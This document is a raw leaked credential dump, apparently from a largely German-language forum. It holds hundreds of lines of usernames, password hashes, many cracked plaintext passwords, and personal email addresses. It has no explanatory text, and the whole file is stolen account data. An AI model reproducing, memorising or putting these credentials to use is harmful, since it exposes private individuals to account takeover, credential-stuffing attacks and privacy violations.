+hexe:9061c7dae72b2ef52ee5b47edc0c34fb::hexe@yahoo.de +bacardi.:ec001436df45eda2ee610d71605263cc::bacardi1337@hotmail.de +Merrox:026135123028e86cd127546ea64a58d5::merrox00x@web.de +ChrIsMas:a171eeacdc7cd3f7200b4d1e82a8c81f891182ef::Chriscene@web.de +LiK:4206f40122a1c62b3a537952842b9c7d::kirwenzin@yahoo.com +Mr.smith1:a3442a6eccfca4cc16f7842337b1763f::thomas.engel1960@web.de +ciao007:89ee59197688c04ee6907e62eecba9503a76f3e7:03318673:kidd.sumisaki@gmx.net +ob00m:da0e6553c2cb1b9f443ace927fcc23d2::ob00m_CI@yahoo.com +leoelboss:2894c706b0b265588b1fd7676ce9f8dc5a2a1808:fergie:suselinux2000@yahoo.com +Zekko:e51310534c12c04b9cad62c727c7cdfb::schnodder13@yahoo.de +Legendzz:0d9274d2f6cf29f4dab5659d841ff27ec54529f3::ShadowShadowShadow@gmx.de +_PaYbAcK_:bd56e73eefd636fdc512f0416b1200d7a5c37a91:123456:ili361@hotmail.de +Credit:230c84044c16d52fcc1bc6a3966f8720::lolsen@trashsada.de +spRayaH:1e9fc33267839cb8faaf1435c0bcb1d2f18709f7:tobias96:traneskater@live.de +Amb0s:32e1903a9924f163e869c07d6263ecb3::abos@mail.ru +fakerca:f42eba8125c8d8adc291ed680d71fae3::Gg_666@gmx.de +real:0459b8cfaa67c913a58221c29d9af880857173d0::dudelmaster@hotmail.de +pumpIThard:1503b8a04beb7cc083df04c35e00133b::gonzo_6_2@web.de +Underground:bfb979cbc8f4d8bf09c9ff580062b7e1::karem995@live.de +moOXiii:11a1ae316649e2e8848b8910ea59856d83b3c3ff::darkneozeroone@gmx.de +st0ne:66b15e1308cf2b3b4ce8f1bbbbcba04d::m_daniela@live.de +Mr Love:8a77b20aa81418685f102c8ce455e8eadf25b9f4::brazzersto@yahoo.com +deathdeeler:9ffeaee2abd0013696d2aa90b1199564::prinzartus@oleco.net +WickedGuy:f7fe1ec2ba630f67d7808c4672017ed33e5b42a3:iamdevil:wickedguyone@yahoo.de +tommy16:9d9beb99132afff085ebca08686451ff::brazzersedit@yahoo.com +HackerZ Ma:121a38c2af08eda2c8216acb7a67c01f::sbmvns@yahoo.com +jerry:880cd1eb81c4a66dc1b131b1cf9f29c9ae340c0f::sadsasdda@live.de +ita:5b3a727984462ee630367be04c480ff59724fd05::itamaster15@aol.de +meph!sto:e08c16f2a80d6ba7f2f3366d8b0f41cf::a4069551@uggsrock.com +RuSsAk:0b61919a9ed61a1333d9cfcd637a7ee87427a668::s.kondratjuk@gmx.de +iiiva:54d763b37bf8697c26ca70ce0cd8ea627aa12108::stevenkom@freenet.de +Dracker:1117961616579463714303f964314d41::sebastianman@ymail.com +mafia97:301f7c9bcc7385e72a0d2c4e0045ea23::zaundas@jhabdkasd.duais +bleck:981da6ef1c239932db7f840af9e8512ccfd849c4:ratiopharm:mmko@gmx.de +miketyson:4da3fc61b515c7b2677025930d1e0345::miketyson@yahoo.com +Propionat:f2c174d4386cf63378360bc5d5cd914b::parabolan@hush.ai +theblackdesert:6209d0f4e636e895e6c2b723de03f334::theblackdesert@googlemail.com +WeedPimp:9d7e6dcbc0fb4d3055ea64b096cacc10::wpimp@hush.com +Jigiman:a3b440346be9e6e832a9a9a782db40c5::DieDos1@web.de +t00:880c6bf89f50ff2a5b76d6384bd0ace8::gaddafi@jesus.ch +restor:b9d22fa882ca2d38cdf5209e3636d0c220b05d86:lerlisearce44:restorius@web.de +uglydoll:7b073684b5ce0c9d61b26e0e90b335e2e68ab300:qazxswedc:uglydoll187@gmail.com +Yasima:0e66c859b2a4065a11559689b6b53c850a2f1952:ficken123:tawaman12@web.de +GreyFox:797b7d4fa2b18b37f2c619ca0930b9c1::bird8@gmx.de +st0ic:8c7b380c7d68b1142bb67ce1ec8449ba::st0ic@mail.ru +djHayabusa:b0f232bc20c5eb424dc8436ef73bff79::badboy1337@mail.3dl.am +itsme:3f41428a320f1ef357dd077fec4fbd1f::itsme@discardmail.de +Bitch:832b0204552f6a6a3dffe279dbbfce9c::x_alex_x@live.de +artsieee:50c3836f74dc1da9dc3a7738e5cc9915::artsieee@gmail.com +UP:a5aa01bda430e1605d770c2cd71c55f8::extremeup@web.de +johnwhodoe:454634aadbf6be064362cb2c7221ebb8fc4170f1:bangbang1:eippelseifen@yahoo.de +humpeNN:0c527d57399ffbf986a23afbd3fa5c29::arx2@gmx.net +Kallye:489c1bb1649579cfc0a0ebc1c011ca9f3a7ffcdd::elmoel@live.de +Marabunta:a2de483cfa4b792ce2ec9180628d0dbd::HassanA91@aol.com +Speedfight2:5ff969612ee790d3489bdbc629020734049857dd:hallo123:oemoem02@web.de +Kokz:ee77c1ac3655d46ccb4acc0a5c50d6f17f5b1543::haakebeck@hotmail.de +Ratzi:149324a2abd814f54426bd0d7bb4042f6a95b1df:lusenheide:ratzi@hushmail.com +F!rewall:642de40603357ef2f4c474bd2768abdb55c7e9f8::Icegloo2201@hotmail.de +c4sh:18bc074dc6a42f73b5af17cd8ff51d8697a8b8e7:duhuso:followyourcolt@gmx.at +moneydude9669:ce6a0911b02fa3873a3989d69718e0ab::moneydude9669@yahoo.com +Pauni:d10b097ca7956d0d7614c6af659f2723::asfas444f@web.de +WcCamper:d5776b4f444fe361664023ebed66ebc26c10e45d::wccamper@yahoo.de +GritzeBrei:9c517cd005cfb5783c9fcb67e1bf7ef4::Peterz90@gmx.de +Revenger:a4951fc182688ec196887c430a5bf5b6::can_66_@hotmail.de +highfly:1ef09440f52913e4b3165426ca1bd40e709d8c10:socken:luisaberlin@live.de +titan1970:878ac1330ee17add566220310fe35379b8a60e1a::titan1970@gmx.de +ZykLoOn:234fb7ff1e5fcf730113722c167a796f87fcea7e::jankriewen@web.de +radisav:42065ab48fa9fd0e1a9a0932774c7e2f::radisavergilas@gmail.com +simonpeters:26632bef52045acfb52b9c8216b27c0d::1dwedwdsefr@yahoo.de +KarstenXXL:927558883cf340171e6601c24d1bb896e4a4f826:174907kk:karsten.k1970@googlemail.com +D-Kay:a9824c5d6f0fd0ac4c1292a8df7081fe2c3e2ba6::l33t@crew.de +fame.de:d4ad733404332d729e81807495e23a62218213b7::fame.de@safe-mail.net +pointflick:eec4ded2849eee5086703de56024b5ca::pointflick4agu@gmail.com +123fruchtis123:f6f327b699fa3e9573fef34bbfd744a7::support.box@live.de +jekat30:59ca7f2dfdbb1c1ea79d61ca3408340a::berkz_3na_18@yahoo.com +_schizm:4abc67ea6552f3e9e22edbbf96ed5e41::myspeedyrx@gmail.com +fullz_fresh:a0003d14005693c8b13d2e21981f5302::fullz_fresh@yahoo.com +Kollegah:9f2aa5c22c65bbdfa331bb293be0a35d::Kollegah_der_Boss@mail.3dl.am +toco:25fbb12467f4d98305206e0d176a032a49319e62::tocopherole@web.de +Sp3iky:6f4b7f0ff778c6fd333d18b3a5f47878fe324fde:techno123:sp3iky@web.de +xoria:a2154af0f37902958e79a7aa0e439bd1::xorrs@spambog.de +f0x:15e0e8ee3695cb5f012c07036f049814::k.meja@live.de +Black_:8772d78e2e5b01b9fb5e043297889ee7a48cc0a3::black38cc-c6@yahoo.com +Casper:0fb4cfcac3f05ecff7fb469ede53a553::Stefan-Diederich@web.de +Dukiereloaded:673a40a6fa9177cb0644948f48fc634f40154b02::sequinboudoir@gmail.com +Opa:c29378d61aa34f058454942bd82e3c8f::hannez@web.de +nobelone:c2fad0a8ea4021ed2cd8bd8c9bde89d2::kielcrime@web.de +c4$her:0046028c3dc4fef795f0292bff8da20e::ichb1nauch@yahoo.de +lozano:60f8b25ca642602d0b28e339aeebda5a::lozano@yahoo.com +ASADi:9701e6df16dd437eceb7bd221e80d380::rdeniro@o2.pl +Constix:492cecbc883ba4914cec4a18c0630dd0::race@partybombe.de +x3r0x:5c3e2862b5ce71bff8d3a072b6a33c39e4403a53::x3r0x@mail.ru +Kiffer:34eacc7f5a9389452ad1661e615db53661d8ace6:kiffer:b.boeckler@web.de +melody:2a9ed9fdf96f76ca9b326bf29b558b08::freeaqy@live.de +whacker:3909ca6f07baedf9bb25d6083ad2491df2a40103:killer12:whacker@mail.3dl.am +skunk:617baf0689c9d0fab14b4437e0228911c5725d2c::lau@spaml.de +daschacka:e5df3e444515097b4b1773bd9ac4c943::daschacka@gmail.com +AirForce:38f1dc25c083bc9f9231debff5a2ae48::dsffdafdsfads@spambog.com +lolly:247dd5f0f1412675b60f8bba74a8d1488fcbed89::lollyholy@yahoo.com +.#Dosenbier^:2f11c755382d19a5f8014ccdf3825152::psp.gamer@online.de +microstyle:462e4f4a9c0f392d2c8b3d4a704de3089cc83737:master24:johnny_knoxville@gmx.de +Acer:c0de0ccaa112998c086ad176154c12934773abfb::acer@cardersi.cc +Arvon:220739b14e1034e38f91a1377bfec6966abb98c7:mystery66:christian_mueller1@hotmail.com +usher99:1e463c10a1802d155dbf601862a0b36221ca738e:12345678:frani111@web.de +]SpAwN[:0e80fd45c9af2b7fdd050832069b724f::kho7o@yahoo.de +AMD:d0bc88f8aae7a2af1b7b5fb732c1a46628a28314:stealth1:a4134912@uggsrock.com +zeqq:14065c716f6124e01ea0bd71334bbf55::zeq@lve.de +schnappermaul:01a1f828d0e94e5646420bcd9a159ec1::ewfwe@gmx.de +steven20:38ad8cc506e562a10ecdbedb60ccdf301bd28158::sina.woerter93@web.de +muit:f3975f9f2d13d1576ef98d681bff4beb::mud@web.de +frazor:ea32fd0b194668d8cab452b00b1ab5a1::sweety41@live.de +Bennyben:ac6a4ea92b18e861b69f1e75bd89d442::bennyben22@web.de +Monaa:c72e3c87fe1c6d40af58106b24b4109f6fd78c23:matthew1:Matthiasn1337@web.de +Jil Tuck:b00e6963b3e4a3c8a360f73c2ef805a4::stefangulker@googlemail.com +Goldenboy:f7e9563a742a4bb6c5f6b3399ed9d6cf2ac735b7:perfect:laternenfan@web.de +powerstoff:9b5fae070c91574c835725f46002aa2700c2b571:08150815:webmaster@f4il.com +WUNDERS0HN:f55123a6e503e55623e6a623caa69fcec76deb91::Alexandr_Kerzhakov@web.de +solo8:07a2962056faea9f19e510e354e5fab5::cookz123666@yahoo.de +Yxaiio:c9775d4497e7180a64ec17672d3008ff331951ff:22662246:TaYy69@googlemail.com +Stehlampe:533b05e6a5a2a18c16bfdd62a6129d80::waswillstdudenn1@web.de +hex3:27505817737d064f55ae22cd76d0df41::h3x1@qip.ru +Offline:ef03ee5fea86d8361bcb7849c5189ca5::kurtz606@hotmail.com +aJ61:0fdaef77ff78899710e11fdbfb4152ae::imamkuzu@live.de +jazzman:8fceab5dc75da75a1d79dae80fc58fa77b9c18e0::coldhd84@hotmail.de +Schnee:eafd210db64bede1fcbbd152a5a49777::schnee@bka.to +King Ling Ling:87d4a17497f347e6371ec92da698f31e::KingLingLing@web.de +Boiii:11507d13ad8744320c2374c3419e366481397838::Ins4ne1337@googlemail.com +BigBozzLutti:b9da478ccd0944d40bb61d4410a5712a::Marcel.Lutti@gmx.de +Money4Cash:4250574efdfd40754685c3a1839742a0::money4cash@hush.com +prinzskara:393d9febbed00acf25703b7dc201e62ae5e14b68:hallo123456:kboole@gmx.de +slojko:06c085532dbf37bd523f00c790506719::alltheblackpeople@gmail.com +cam0ra:8d98bd96a419ae1e22f958a3c6ad08cf::sturm661@web.de +drekady:5621e8eaecbd02ef50dff09ee4effd1f633e4af2::drekady1338@web.de +Bashia:82c8ce35d87bfb0d49d99a4d4fb24acc::Bashia@live.de +Thats_me:e0d4fdee8214ddf2f778743f6e812d82::advance@gmail.com +schneeMANN:957f83a4ab1a195269a5add345a67a19::schneemann@hush.ai +Scene:d6d7b8e0d48605ec0048f33f0e5350a5::Kralle751@web.de +nokamf:c3079ede40338cc4a8e028d5aa36f8e8::nokamf@gmail.com +Ganymedes:6c356330d1cd1b6fde4543862d6f12f443a64c85::mczieead@yahoo.de +jumpstyle:06569dfc9798014c0a068d6261f47989::schoolhater@web.de +bolide:419f5b8c015c6689d802df9e892572c9::rakovozru@mail.ru +lala:17ed9fd3d5309781e670976fc628b11a9bb7d9b0:lol123:domrushxs@yahoo.com +kukumalo:3a0f3026da1ad06a0518463daa4df9b5::kukumalo@gmx.net +BlackRazzer:010cd77353539ceabc4970b0bd459873::wowplay@gmx.net +slashx:4daf6f6064f50c2c642b6906780de28934330729::jobby.cyriac@web.de +bandog:6cd10fc30a5f1211a81a6fa62935232b::mustafa-sonturk@web.de +DarylGecko:d655045c8688d73ea58e0b3425fd0809bafd9dab:Swantje:Mattock@freenet.de +ghostx:d8c3a5368e5e8c577828bc8343bbbc9aa9a891e8:sniper05:dhevyan@yahoo.com +underg22:79463f9599493942115408dc74d673673a9be373:241625:jamezlickz@gmail.com +vntung:762b60e05a90f21b33442261a1114db9::der_sogeking@yahoo.de +KRAL 68:1205d3cbd3a2960ed2f7e549ec50e872::emrey68@yahoo.de +Ezi0:67cc16418150861457351d64efa447d8::ezio1337@web.de +charlieharper:87e3d2416461c3fcef58fc5324fd050086aad9e6:kai123456:charlieharper@hush.com +cc-fuck62:41535db98588231ca2dc84293ec6cbf7::aqqa@hotmail.de +xanden:59dc173eaa2bbb79b6040071fb1cf8de779bcd52:werder12:killer.wwe@gmx.de +Siakospel:59b35e90ad172053df6b9956546a0d2ef3719786::sinaeddy@web.de +Ohneripper!:d57718e4824684a9510291ede4be3ab1::hamsterka@web.de +summer:33019417b4c105a94650539615d7f59bec3f65a8:hallo:sven.hellwing@hotmail.de +Pussycat Troll:8019b772e78bdae60184c5ad82894a84::a3980908@uggsrock.com +jacha91:fbfde78fa539e0ac08df6f424f143662::jacha91@googlemail.com +Augsbunet:3a941fe589e9d4231a049f4b37764803::adromeaugsburgstheater@googlemail.com +NaYderZ:e43f7c0eb3138098c513c5dc1fc2d7b7::Core-Recordz@gmx.de +J.T-R:2ef7ab76be2e777df5529c670e7a6d24::leosander@gmx.net +AnubiS:68008f4035f485bd1993958a5f13b5c4::PauMul1@web.de +ToterOpa:81335867f40f3db54a34f67d4ebb03b1a288acc5::teddyboy20@live.de +nasty:bed1a98e7cb7f3a73351f9e77054efc0::suckx@hotmail.de +wersuv:5c6152342eb647d73e44b4382278cb330c75f5bd:Nikolaj!:wersuv66@web.de +warzlin:9d5b4c5dff596f398329b5546566d08d::blablubb452@kuh.mu +mastercard:c486cf22322dbfb0219d01c603679085::halitblack@gmx.de +Ektoplasma:2924cbc29382d0c96332b20ac0ad4caa::a3989695@uggsrock.com +@htc:56fe9839e4e56217854fc321d7dc6bdd::banger973@yahoo.com +zuka:52b1c6be5039d9bf3780ec009ee72bea::zzzuk4-mail@web.de +savayero66:51cdba996b7f4d1c6397407185b36146::enes14000@hotmail.com +Aquintus1988:9c0ac3991f2c2cffea1368916eecd86e::hackerelectric@gmail.com +MMOXtreme:33478823d0e16da3c7514cdaba03fa6f::stream3g@googlemail.com +money maker:f846e27c7cd98267e0a9074b30657a59::badboy@hotmail.ru +onix:50e5ce66419984b754a6c84d3cb0461b8f280823::moviesite@web.de +savayero14:eb1b6e9937524c72cc092d4c36c97e48::ewerthon66@live.fr +myDesire:0f647b2f7dc48cdd4a2298f042275be3::Desire@hushmail.com +dopex:d17ccded17e47440b85789d4e678ae9388ea6d49:fuckin:xdopexx@yahoo.de +ES:853aa89f267eb5b7277caa84d526574108182c8e:abc123:es@2009.temporarily.de +YasSab:f464427604ac1b51977896ef3bfaad13::sino-styler@hotmail.de +savayero:5bef77df923f4f17f0481992c6140872::gunayturko@hotmail.fr +cancel:f5db531dde09651745e89cfe2ae3ee72::kila@sdfj.de +blackhack:8c1faf9cd53841cb184161dbecfe46e7::anonymousguys@gmail.com +nicola:0e76b257b71544e6e8bf79f6c05cba40cdfb3331::ximin@mail.com +Zer0Phr34k:29c463c256108f861b4a8a6917996a5a3e720f16::toxicgp@web.de +3kto-one:f1a20eeb3ffb68a2c80ab818c5c87dfe::KunzeGero@web.de +H4ck3r:78f06a6cb342d33af879ba43081caf9d::s.w.a.t.93@hotmail.de +lamontana:7421f21452544a12a2a0419fe8a9146e::klasno1@hotmail.de +Zentrat:536f81929dda19e3bc02b6688d77df16::aaavvvbh@web.de +thewatcher:8d3a1d1c3fc9fd962915872ac83efd87::t_400@web.de +NoobCrasher:62b9b2abf5844853816fc33b28c7e35b::mux0r1@web.de +ronaldinho:1afc7c06d7bb0c998fa1e2aaf37074fe::fofinha14@hotmail.fr +Godlike:e258b08a1322f2245a1245bf8039d460::godlikeone@web.de +Cesar:e0ab2b9f0583a76447a297096fb8a6e3::bas@bas.de +Exchanger:f90d9e92dbda7e35b8301e9b15ba0db7::laubekay@yahoo.de +###:0d78e8ee3585cdaf67ba6904553dffa7::cj-@arcor.de +Tiberius:876737f91a54b32c18d927acb1d4e528754c06f7:: +schmiggo:a0d9a1c3a2a2ccaf00a7f8ecc004b657::schmiggo95@gmx.net +goinat1337:d89c3c974325113a1d38e3bc678f0fa1655a15e4:hurensohn1:duke9681@web.de +fearkey3:dfceb56d4437ec5b67ac6fc9e966dbbf::fearkey3@web.de +naduraka:5d71ce46414826485ea07372fc080968::naduraka@yahoo.de +never_be_mind:bffd576c5fa1b31ed2fb408352e056a3::blabla1113@hotmail.de +Spaider33:3e9f4810b9037b77e923fb0c9dda63f3::geachiav@incognitomail.net +Peet:34f5d912ce08495c16da64687536526b63a262c2:Tachchen:vckslayer@gmx.de +blackey:ab93fd7bd3995d5972aad1858db1736b::nikez29-1@yahoo.de +egal:952d13167b7b79abf3f39af6411eee4eaac09d2b:18041980:egal@hush.com +kanari8:b96b20509180c76447797c06792c10ae::kakakaka115@hotmail.fr +yolle:201292d9d1ed3bf970628cbe9e3593b97d180324::y.t@hotmail.de +killergurke90:27d21a2a03e9d4183536e62f2ec6dc41::killergurke90@gmx.de +systemboss:edc228bbfa73aceaccbbdec2b869440b6b313459::abdilov2e2@hotmail.com +xtrem:2a05d1bf1e73e5b6b29e28b5b27bb143bb5247ce:lars7089:fakenext@gmail.com +Switchmaster:35f3b9e63ce09b66b96987e1f7602d1ff683af58::switchmaster@arcor.de +DeAlex:ad970163df13fa2947626c569dc36b82::hermanschm@kuh.mu +UnReaL792:02b75e2b3381dd54402c81868ccc63b4::jhasnfdjkasjna@web.de +Spacetom:97f64c8ac50cb922bba5c177bded75faa64a0145:ich123:isecketom@web.de +Sonneneruption:6562f980ea4c538c33a7d6942a4a3009::sonneneruption@kuh.mu +desibug:f5a0beac7274ccc4762968b70fb73de09fca1030::gabriel_pawlowsky@yahoo.de +Tamiflu:eceb619eddcfda1c4bbf560be40c171b::tamiflu1337@hotmail.de +Suriv:45ae8506fb83087aacd450543089451966e888e2::schuster96@gmx.de +yeswecan:af2ab520fe957696d74136838ff2157e::benjamin.brendel89@web.de +T0x!n:26515c9260b52d8fe15aa6f509792f66::fl00d@web.de +Zagerus:ca21e4817e013efbd60f304efb7f40aa12b6574a::zagerus@inbox.ru +Pappe:8169e57b9b6cdfad23f64b517c44390c::pappe20@web.de +Killerkeks:4b64d5fe1507109109a4fec9f886e83e2589d248:123asdf123:DbEcBgDe24@web.de +donnie_yen:01958847b9cd35d8c199f666231ec84e::p.g.1337@hotmail.de +gheddoblaschda:867d3a4e4fd5db68228306c69f6d7304::deslebens123@googlemail.com +VPN24:f257c7586f277027e7b21254fbc70c8355a8caed:changeme: +Nop0x90:03ddd962c3147ca9092eb5b49a6181d8fcdc7e29:schokolade123:nooblovv@web.de +semih44:3a58930716e06cf80c84d8334db118ca::semih44@hotmail.de +OwenWalker:792a7feceec88ce0537e777446a1b6ea::OwenWalker@web.de +Gewalttat:c46312b93c15064b07343d999403072cf88ca843::sylvana.ross@yahoo.de +malaga125:ab8b646712ba2575dd864b06f78cf717::a4093310@uggsrock.com +hoxis:ca86828dee7ea1de2695f71fd476b70db6d4be12:fucken:daleeb@gmail.com +III:0adf7b7d3a135d6945f84dd389332dcb5773bf05:123321:iiiiiiiii@hotmail.de +autoGaist:a92411fecf64f8e66bf0425c22508905dac589b3::autogaist@israel-shalom.com +hakan:88e9817db25256c1762e3a8ba572267e::myblack@hotmail.fr +Sir:dfe465f2af1827b6edaf0e2a988b480c::zlegacy911@yahoo.com +BlueToxic:89c92e6bf0d569f4ede90741d46f2aa5::bluetoxic@bk.ru +jmr423:1ac3d96988b71b68cff8143126fe17e1::jmr_423@msn.com +Panic:ea5fd8fb9e0b914be4d9c6c34cd2cea0::titte.gab@web.de +ragga.muffin:01f46db8543bb8109f1d132643049e893cfb46c8:deinvater:mongobylongo@hotmail.com +charlestonscar:66e2cda9f0484f6e6b5a5a0002b323b0566bc15c::9ja9900@gmail.com +AllCard:0ecfb224e9c092a307a11125ceb0e557::polatblack@gmx.de +phenom:dd9d5bdc0555539c4b1a107a363bdf1805c6bd29:sander123:gaemer90@web.de +j0kR:bc469ef3515d5ee9aaac539bc31fc9caa1c1169c::j0kR7@web.de +mauidu:1735e5dc9c1f659ead6d88316243635b::maui-du@hotmail.de +FLAMEPL2:4617077f3755e5ec259b2d6944eaa537::M.Plumpsko@web.de +Vogel #1:2648c63906e9bf4c2e95a0d7630ee037d181bb64:ilsils:tanton@web.de +erdnuss:067bacec45372d86b151a4ba9f632ace::a4101153@uggsrock.com +prisma:01f605e0739b6f3c2905d3f1f00ce39686358b41::tobias_wk@gmx.de +Vobis:97cdb54abb00a838500ba9dd7793f4ea28d80593:1q2w3e4r:In_Flames93@gmx.de +DHL:a46b4e33c2e71373a0fb1e790bfe70e6ed42355d:umbre:psseller@gmx.de +dejavue:41ad6324fd5d741c15d680bae11926a0de0ea101:lol1337:dennis.menz@hotmail.de +Pok:d79e81ec9e94321663abdbdf6eebbf52::pokpok@z1p.biz +StrikerX199:92a2e82c1d9bbc090145e728cffbdf284c1afe5c::strikerx199@live.de +Amphis:0bc8e5fcf0b8907782fdb5b78893bd0a::twentynine@e-mail.tl +hotfreeze:8a4be346f78558690495efb6f57fd956::steiner.stefan@gmx.de +b1ack0ut:0cf35cb41cc00239448b6813267c188318ffbf6c:fcbc007:blizzard-acc@gmx.de +anghtwolf:7be3febb7a9cfe40f09e16da1c5abb04e963ecc1:nite1234:computers4uinc@gmail.com +Y0U:634ebe84ce550488f249cce4ea5dd101::rickross@mail.ru +oKay:513bb964aec4bffce6963687784a48dc::threesixmafia@web.de +c4rd:1f258ca5fc03a2d4ac4f7fa7c0192c71::c4rd.org@gmail.com +!Anonym!:2d94f630541af0290bb0c28d53d389a2cd6bc3e5:friedenau41:max_41@gmx.de +HeppyFree:b32b15e738c7b962ffc898745f2f932851a83d23:15829672B:Excalibur2008@web.de +TimeKiller:1714fbe71d4bb1345fb158fa8a15e7b5ae4284a3::time.killer@hotmail.de +mozes:a41c6e8d93ae83dd270e161f5be01322::h.ronsiek@web.de +Torchwood:da56da3d33b24357dc1efbee78fb1eb8::klaus.mueller4@gmx.de +Olidaeine:3c11029616c5bd87774d715073831766c3d8d57b::olli_lance@hotmail.com +boot:d943bb53211980529ff4f8385fefd6a6::bootmywin7@gmx.de +crack91:bb5bde55feb512e899f782c0873cb9326cff0aa2:clan123:lockers@safe-mail.net +acryl:b7473fdcd86fa5408cb278bfcc3aaf73::acryl@spam.la +Empire:6f4deba019a08c090b0a8b4ae9bb6dd8::a4123713@uggsrock.com +Herodes:ea0471b5b157734e8274163d525167a9::Herodesxxx@secure-mail.biz +Slim.EmCee:5f6e797356de29fa4d2e0013e246c3a288d92cbf::gammlerdestodes@googlemail.com +NDTBIT:c071127882bfb4ee7c0b31aa3d36b0353f075f98::5name@web.de +Kroni:4fbd778f7f12c44e3afab4306a2f911fc8b46dde:unbekannt:kevin.kronenberg@web.de +colya:d1b9457985e04b034b747c10d877ea98616f94de::herrthomasmorris@yahoo.de +rma:eb50f6a3e9bdceee9dcd380ebb6a4cfa::rma@dr.com +Legend300:118371ddb1481c0d60f705a0748b64b5f6ce0d53:666199:rey6619@arcor.de +SaWis1337:2e62ac427cb3823f5763cab29398e877::pgsaw@gmx.de +Bedar:1e0d51911f08178c448eb349eeba449e::peter.jablonowski@hotmail.com +Mars:e90eaf18808355c38f539d9a0ee84bcdf8b2a08c::scheissdrecks@drecks.de +DJENA:7a1f5e40a4f0315140ca0c1c9418034b::ena1990@live.de +3lkasino:b82870440bc500d0da2b571794bffbea11919eb6::no_name05@hotmail.de +King99:10d30caba744518ca6a3a5dd925faad2fa76e119::buxtehude99@web.de +Unleashed:6b645cb253f7f15a1c9e8c2747d7ce84a9bb4712::wilkens123@web.de +wassilij:043880ea0bbb295ccd9d6186f810a58b74ed47a7::webmaster-wassilij@web.de +Stype:d83b953618808307abd9b4cddb6ebb8b::stype1337@yahoo.de +Proxy:498c41715abc9e0d4c85af1ca8d0f115::perfectprivacy@mail.ru +lolo0815:be2eb10f423f667dc861b651a9373a48::lolo0815@mail.3dl.am +VisaCard:3a3055ff75d6c2b778e0402197a23c02::burcakblack@gmx.de +ACHEL0S:850945547809c676c1d730a3993e69754526b428:dicker12345:asdasdjj@web.de +DJdALI0.:394f2e93b491b1009b827563e684c792::wadawwa@live.de +h4Rd:f0966154f2ec3d50317c67678e48bc802c771230::mbresler35@googlemail.com +Blutrab3:4d94da2ae842b042a9c0e96660957cd7::blutrab3@freenet.de +Banana:5a12eeb214bfc7bdfb5ed74c5e6fb63a::seanpaul@web.de +Weltwunder:7cff21407d6858bf04cda1cb41cee97f::releasme@z1p.biz +iPwn:22611bc9c9678c39b157bd1fbbb09ead::shockw4ve@live.de +QuestionTag:5d5104ef4ec013ba246d09eac4a1822f::syntec1234@web.de +Freakasod:3fdca52ba62a4bd945b3b1ab42d1d2b6d19ca778:ficken123:FleTschi@pochta.ru +onur19:bb4e9ce6bcd10367b20a2fc5dd3349845ae2456e:qwertz:styler_burc@hotmail.de +9175:a0ca79edbf7994490ce24c8f91c75c2f86a077a1::bulli.ledz@gmail.com +Movie:505651713c71a467936593eb3d8a7000::movieman20@arcor.de +Pr1vateboy:1c3e12f92e69e31ec838cf562287e456084d595f::the-doe@web.de +SainT:1fa5090d5526497aaf848951a85339ebe768938c:hallo01:hab-ich-vergessen@gmx.de +mmano:bdf4950c6eee66e223a77cc92fab5418::tssponsor.ath.cx@web.de +Dr.Extase:25d291ba13170a3b53c73570a5dab64c::k.kero@web.de +Cyka:f5c991a2e37924c04c4990e211d5c3a8::natasha.lukienko@web.de +ppp:fb827f74482d4cd0d3fbbf2184239eae5f3199c9::lomba@safe-mail.net +Style94:e9594d7907f82e68186180c1885dbcff::ruby_@live.de +justin1209:23d7584c81ba64b8aec650b68a040cbc::jegor.iwanow@mail.ru +havok:d96f2feb9d07ebb1dd9e9ba5f9e944c7::havok_metal@hotmail.de +STEV1E:a4d714b775e0381f7be05c0cbb35407a::stevitheking@hotmail.de +leon2lex:5598c47cfc4261ef0282b3d6e6fdc4719b407232::leon2lex@googlemail.com +Babushka:937d73f0a2a2d94d4f51c7d731381c8e9055819e:login99:dr.peter-weigler@gmx.de +karensunder:10741a7dc8a9d9656f790607235d802f::karensunder@gmail.com +crephix:2e9484313334729cccc071578c81b2a3d0ab3658::martin84@gmx.de +Paypal seller:15a6a2d90946e30563526c1795f382f5::fgfhgf@web.de +Dinja:1db322e97a6786f51b5d65c7e53112a0::mix_rus@hotmail.de +Frank White:2707677405192fc9cae54d605c7ea0a3::b25977@uggsrock.com +Playagirl004:d7a1265abc72443b9f32cc6d7cf6fb8c::bambelbu2@web.de +luizlauro:1d988f1f1d0b600d35c0906709dcd63c::luizlauro@hotmail.com +hq-cc:b15e07acc7623056eb26cdea5fe4f321::hq@web.de +Skanderbeg:bfb2bf99a38d2cf327963c90d69aa8d9b6eab100:hunter:skanderbeg@trash-mail.com +qweasy:810bfa7fa76e7071e130dd75583b1cf5::svenf8@aol.com +Teufel:905680d291ca0423e770c78b603c0e9a::teufelsound@mail.ru +404:20c97749111959d3d254c23ed5ec63b0::error@gibtnich.de +sh00t:1b17a46a33675173e9dfc3bc15c0faf0a0b63912::timelove77@gmail.com +Heroinas:00614b9097d9f2ec70f4463ec2b05b7efaee6d38:147258369:h3r01n4s@gmail.com +BiOoPERaTiOn:11bc339ef12a50c7167ef7fb45ddb2f95438979a::karloliver@gmx.de +BlackHook:b08c15be22f745fc8d521b7ba3c9ed92d260054d::BlackHook@gmx.net +TheOnlyOne:739d142e0420873c877ad814cef931ee::b56771@uggsrock.com +Cashoutdumps:2b6eafd97c6028cdd95b7b9831e9abed::cashoutdumps@yahoo.com +Comeback:738d22fdd4b149b46d025ae885ef6f7a::comebackonline@gulli.com +Virus:69648f40bbbc94ca21f2264801116067::admin@salih515.co.cc +aslow:c3cf6967880d7617d78f9b390c75d739fe282951::aslow@hush.com +Cordonbleu:2b403d5692ef2f610039157d597b5d14e1de2f88:kollegah:marian95m1@live.de +Street12Skater:b61b32e830755696e6012dc08abbf4b9::Streetfighter1212@msn.com +Hackt0r:7d8494e175247736c3c30dbb6d4584a8::hackt0r@gmx.de +Pyri:567c2e725aa20a8a52dc3978ddb4f79b::lukasfink@rocketmail.com +Namelocked:7c5e933424ad84b5293ff26930647b83::namelocked@kuh.mu +Dr.Illu:cc07c310f547f7313631b5c0cd80bbed07af70cf::ruhrpott.dgt@googlemail.com +Out:ec980574500aee917c8266655cbc547d::offshore@w.cn +mature:68db9e6dd5e2c6ac9abbf9ed616a7901::maturem@gmail.com +Abdul:14ae95ff560a637a703b5d5e07df10be::mr.amine1996@hotmail.de +Skillz:62fef369c73d70dd9b3bb9c1d704219b::debhall111@gmail.com +Maccaveli:16bffd7155dcf30fcc36b845feeb48f0::res.maccaveli@googlemail.com +s4t0x:cf83f57df1b5ca24c4ece994b7412432::s4t0x@Safe-mail.net +feelfree9me:8f62eaf22115f1c59df061044cd683eb::feelfree9me@yahoo.com 